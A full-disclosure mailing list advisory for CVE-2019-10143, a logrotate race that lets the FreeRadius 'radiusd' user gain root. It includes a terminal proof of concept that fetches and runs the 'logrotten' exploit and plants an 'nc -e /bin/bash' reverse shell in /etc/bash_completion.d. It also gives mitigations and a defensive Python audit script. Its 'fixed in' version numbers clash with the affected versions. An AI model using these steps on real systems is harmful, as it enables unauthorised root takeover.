
List:       full-disclosure
Subject:    [FD] [AIT-SA-20191112-01] CVE-2019-10143: Privilege Escalation via Logrotate in FreeRadius
From:       sec-advisory <sec-advisory () ait ! ac ! at>
Date:       2019-11-15 9:05:43
Message-ID: 3dd3fcd10e644dac83025d94a4364dd8 () ait ! ac ! at

# Privilege Escalation via Logrotate in FreeRadius

## Overview
Identifier: AIT-SA-20191112-01
Target: FreeRadius
Vendor: FreeRadius
Version: all versions including 3.0.19
Fixed in Version: 12.2.3, 12.1.8 and 12.0.8
CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-10143
Accessibility: Local
Severity: Low
Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)

## Summary
[FreeRadius](https://freeradius.org/) is a modular open-source RADIUS suite.

## Vulnerability Description
The log directory "radacct" is owned by user "radiusd". User "radiusd" can elevate its privileges to "root" because of an unsafe interaction with logrotate. User "radiusd" owns the log directory /var/log/radius/radacct:

```
drwx------. 3 radiusd radiusd 4096 26. Apr 16:01 /var/log/radius/radacct/
```
Log files are rotated once a day (or at any other configured frequency) by logrotate, which runs as user root. The configuration does not use the "su" directive:

```
/var/log/radius/radacct/*/detail {
        monthly
        rotate 4
        nocreate
        missingok
        compress
}
```

Since logrotate is prone to a race condition (see https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition), it is possible for user "radiusd" to replace the directory /var/log/radius/radacct/logdir with a symbolic link to any directory (for example /etc/bash_completion.d). logrotate will then place the compressed files AS ROOT into /etc/bash_completion.d and set their owner and group to "radiusd.radiusd". An attacker could simply place a reverse shell into this file. As soon as root logs in, the reverse shell will be executed.

Details of the race condition in logrotate can be found at:

*   https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
*   https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
*   https://github.com/whotwagner/logrotten

## Proof of Concept
The following example illustrates how an attacker who has already gained a shell as user "radiusd" can elevate their privileges to "root". After downloading and compiling, the exploit is executed and waits until the next daily run of logrotate. If the rotation of the log file succeeds, a new file containing the reverse shell payload is written into /etc/bash_completion.d/ with owner "radiusd". As soon as root logs in, the reverse shell is executed and opens a shell on the attacker's netcat listener:

```
radiusd@redhat7:~$ git clone https://github.com/whotwagner/logrotten.git /tmp/logrotten
Cloning into '/tmp/logrotten'...
remote: Enumerating objects: 84, done.
remote: Counting objects: 100% (84/84), done.
remote: Compressing objects: 100% (58/58), done.
remote: Total 84 (delta 35), reused 64 (delta 24), pack-reused 0
Unpacking objects: 100% (84/84), done.
radiusd@redhat7:~$ mkdir -p /var/log/radius/radacct/logdir
radiusd@redhat7:~$ touch /var/log/radius/radacct/logdir/detail
radiusd@redhat7:~$ cd /tmp/logrotten && gcc -o logrotten logrotten.c
radiusd@redhat7:/tmp/logrotten$ ./logrotten -c /var/log/radius/radacct/logdir/detail
Waiting for rotating /var/log/radius/radacct/logdir/detail...
Renamed /var/log/radius/radacct/logdir/detail with /var/log/radius/radacct/logdir/detail2 and created symlink to /etc/bash_completion.d Done!
radiusd@redhat7:/tmp/logrotten$ ls -l /etc/bash_completion.d/
total 20
-rw-r--r-- 1 root root 11144 Oct 28  2018 grub
-rw-r--r-- 1 radiusd  radiusd     33 May 12 18:44 detail.1.gz
radiusd@redhat7:/tmp/logrotten$ echo  "if [ \`id -u\` -eq 0 ]; then (/bin/nc -e /bin/bash localhost 3333 &); fi" > /etc/bash_completion.d/detail.1.gz
radiusd@redhat7:/tmp/logrotten$ nc -nvlp 3333
listening on [any] 3333 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 55526
id
uid=0(root) gid=0(root) groups=0(root)
```

## Vulnerable Versions
All versions including 3.0.19

## Tested Versions
Name : freeradius
Architecture: x86_64
Version: 3.0.13
Release: 9.el7_5

## Impact
An attacker who has already obtained a valid shell as user "radiusd" could elevate privileges to "root". The fact that another exploit is needed to obtain that shell lowers the severity from high to low.

## Mitigation
Add "su radiusd:radiusd" to all log sections in /etc/logrotate.d/radiusd.
Keeping SELinux in "Enforcing" mode limits the directories the "radiusd" user can write to.
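
As an added defender-side check (not part of this advisory or of FreeRadius), the following Python script audits logrotate stanzas for exactly the situation described above: a log path whose literal parent directory is owned by a non-root user, rotated by root with no `su` directive. The sample config and the ownership table are constructed to mirror the advisory; the sample used in the test spells the directive the way logrotate's manual does, `su user group`.

```python
"""Audit logrotate stanzas for the pattern in this advisory: a log path inside a
directory owned by a non-root user, rotated as root because `su` is absent."""
import re

# Constructed sample: the radacct stanza quoted in the advisory, which has no `su`.
SAMPLE_CONFIG = """\
/var/log/radius/radacct/*/detail {
        monthly
        rotate 4
        nocreate
        missingok
        compress
}
"""
# Constructed ownership table standing in for stat() on the affected host; on a
# real host pass e.g. lambda p: pwd.getpwuid(os.stat(p).st_uid).pw_name instead.
SAMPLE_OWNERS = {"/var/log/radius/radacct": "radiusd", "/var/log/radius": "root"}

STANZA_RE = re.compile(r"^\s*(?P<paths>[^{}\n]+?)\s*\{(?P<body>[^}]*)\}", re.M)
GLOB_CHARS = set("*?[")

def parse_stanzas(text):
    """Yield (path_patterns, directives) for each `paths { ... }` block."""
    for m in STANZA_RE.finditer(text):
        lines = [ln.strip() for ln in m.group("body").splitlines()]
        yield m.group("paths").split(), [ln for ln in lines if ln and ln[0] != "#"]

def literal_parent(pattern):
    """Longest glob-free directory prefix (/var/log/radius/radacct for the advisory's path)."""
    keep = []
    for part in pattern.split("/")[:-1]:  # drop the file-name component
        if GLOB_CHARS & set(part):
            break
        keep.append(part)
    return "/".join(keep) or "/"

def audit(text, owner_of):
    """Return (pattern, directory, owner) for each stanza rotated as root whose
    literal parent directory is owned by someone other than root."""
    findings = []
    for paths, directives in parse_stanzas(text):
        if any(d.split()[0] == "su" for d in directives):
            continue  # `su user group` makes logrotate drop privileges first
        for pattern in paths:
            directory = literal_parent(pattern)
            owner = owner_of(directory)
            if owner is not None and owner != "root":
                findings.append((pattern, directory, owner))
    return findings
```

Run `audit(open("/etc/logrotate.d/radiusd").read(), owner_of)` with a real ownership lookup to check a host; an empty list means every stanza either uses `su` or rotates inside a root-owned directory.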

## References
*  https://access.redhat.com/security/cve/cve-2019-10143
*  https://nvd.nist.gov/vuln/detail/CVE-2019-10143

## Vendor Contact Timeline

* `2019-05-01` Contacting RedHat
* `2019-05-07` RedHat opens issue at the vendor bugtracker
* `2019-05-23` CVE gets assigned to the issue
* `2019-05-24` FreeRadius is skeptical about the "security" impact
* `2019-11-12` Public disclosure

## Notes
This CVE is disputed because the vendor [stated that there is no known remote code execution in freeradius that allows an attacker to gain a shell as user "radiusd"](https://freeradius.org/security/). CVEs are not only assigned for vulnerabilities but also for exposures that allow an attacker to have a stronger impact after a successful attack. Therefore we believe that it is important to file this issue as a security-related bug.

## Advisory URL
https://www.ait.ac.at/ait-sa-20191112-01-privilege-escalation-via-logrotate-in-freeradius

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

